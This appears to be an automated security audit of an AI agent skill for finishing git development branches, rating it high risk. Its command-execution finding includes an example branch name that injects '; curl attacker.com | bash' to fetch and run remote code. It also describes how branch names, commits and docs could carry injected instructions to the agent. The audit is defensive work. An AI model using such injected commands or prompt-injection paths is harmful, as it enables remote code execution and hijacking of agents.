finishing-a-development-branch

Fail

Audited by Gen Agent Trust Hub on Feb 16, 2026

Risk Level: HIGH (COMMAND_EXECUTION, PROMPT_INJECTION)
Full Analysis
  • COMMAND_EXECUTION (HIGH): The skill performs direct shell interpolation of variables like and across multiple steps. A malicious actor could craft a branch name containing shell metacharacters (e.g., ; curl attacker.com | bash) to achieve remote code execution when the agent executes git commands in Step 4 and Step 6.
  • INDIRECT_PROMPT_INJECTION (HIGH): The skill ingests untrusted data from the local environment and uses it to drive high-privilege operations.
      1. Ingestion points: Branch names, commit history, and the contents of docs/test-plans/ files.
      2. Boundary markers: None are present to prevent the agent from interpreting embedded instructions in branch metadata or documentation.
      3. Capability inventory: Destructive git operations (delete), network operations (git push, gh pr create), and arbitrary code execution via project test suites.
      4. Sanitization: No validation or escaping is performed on environmental data before shell execution or subagent invocation.
  • EXTERNAL_DOWNLOADS (LOW): The skill performs git pull and git push operations. While these are necessary for the skill's purpose, they involve interaction with remote servers that could host malicious content.
Recommendations
  • AI detected serious security threats
Audit Metadata
Risk Level: HIGH
Analyzed: Feb 16, 2026, 07:43 AM